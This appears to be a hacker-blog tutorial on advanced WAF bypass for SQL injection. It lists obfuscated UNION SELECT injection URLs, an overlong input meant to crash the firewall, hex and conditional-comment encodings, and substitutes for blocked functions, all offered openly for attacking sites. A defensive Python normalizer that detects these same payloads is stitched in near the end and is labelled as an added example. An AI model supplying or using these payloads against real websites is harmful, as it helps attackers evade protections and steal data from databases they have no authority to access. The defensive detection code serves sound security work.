ByPassing WAF | Advance Methods
Advanced Methods:
Now that you have learned about basic WAF bypassing, it is time to look at some more advanced methods!
If you have not read my first post on BASIC WAF BYPASSING yet, read it here first: Basic Method
1) Buffer Overflow / Firewall Crash:
Many firewalls are written in C/C++, and we can crash them with a buffer overflow!
http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4….
(You can test whether the WAF can be crashed by requesting:
?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4….
If you get an HTTP 500, you can exploit it using the buffer overflow method!)
2) Replace Characters with their HEX Values:
We can replace some characters with their hex (URL-encoded) values.
Example:
http://www.site.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4….
(which decodes to “union select”)
Text to Hex Encoder (Choose the “Hex Encoded for URL” result!):
http://www.swingnote.com/tools/texttohex.php
3) Use other Variables or Commands instead of the common ones for SQLi:
Apart from “UNION SELECT”, other commands might be blocked as well.
Commonly blocked commands and their replacements:
COMMAND        | WHAT TO USE INSTEAD
@@version      | version()
concat()       | concat_ws() (difference between concat() and concat_ws(): http://is.gd/VEeiDU)
group_concat() | concat_ws()
4) Misc Exploitable Functions:
Many firewalls try to offer more protection by adding prototype or strange functions (which, of course, we can exploit!):
Example:
The firewall below replaces “*” (asterisks) with whitespace! What we can do is this:
http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4…
(If the Firewall removes the “*”, the result will be: 15+union+select….)
So, if you find such a silly function, you can exploit it this way! :-D
[+] In addition to the previous example, some other bypasses might be:
-15+(uNioN)+(sElECt)….
-15+(uNioN+SeleCT)+…
-15+(UnI)(oN)+(SeL)(ecT)+….
-15+union (select 1,2,3,4…)
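From the defender's side, every variant in this post beats a filter that looks for the literal string "union select", yet all of them collapse to the same tokens once the request is decoded the way the database will read it. The script below is an added example (not from the original post or any WAF product): it URL-decodes, strips the comment tricks and parentheses, optionally applies the asterisk-stripping described above, and only then matches; the SAMPLES list is constructed from the fragments quoted in this post and the function names are this example's own.

```python
import re
from urllib.parse import unquote_plus

# Constructed test input: the obfuscated fragments quoted in this post.
SAMPLES = [
    "-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4",
    "null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4",
    "-15+uni*on+sel*ect+1,2,3,4",
    "-15+(uNioN)+(sElECt)+1,2,3,4",
    "-15+union (select 1,2,3,4)",
]

UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+|distinct\s+)?select\b")


def normalize(raw: str, wrapper_strips_asterisks: bool = False) -> str:
    """Reduce a query-string value to the form the database would parse."""
    s = unquote_plus(raw)                     # %0A, %6e, %55 ... and '+' as space
    # MySQL executes the body of /*!NNNNN ... */ conditional comments, so only
    # the opening marker is removed and the keyword inside is kept.
    s = re.sub(r"/\*!\d*", " ", s)
    # Plain /* ... */ comments are no-ops to the parser: drop them whole.
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    s = s.replace("*/", " ")                  # closers left over from the step above
    if wrapper_strips_asterisks:
        # Mirror the post's WAF that deletes "*" before forwarding the request:
        # the check must run on what the backend receives, not on the raw input.
        s = s.replace("*", "")
    # Parentheses and any whitespace (newlines included) just separate tokens.
    return re.sub(r"[()\s]+", " ", s).strip().lower()


def is_union_select(raw: str, **opts) -> bool:
    """True when the normalised value contains a UNION ... SELECT clause."""
    return UNION_SELECT.search(normalize(raw, **opts)) is not None


if __name__ == "__main__":
    for sample in SAMPLES:
        hit = is_union_select(sample, wrapper_strips_asterisks=True)
        print(f"{hit!s:5} {normalize(sample, wrapper_strips_asterisks=True)}")
```

Run without `wrapper_strips_asterisks`, the "uni*on sel*ect" sample is not flagged, which is exactly the gap the asterisk-stripping firewall creates: it inspects one string and forwards another.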
I hope this post has given you a clear understanding of how you can bypass the WAF.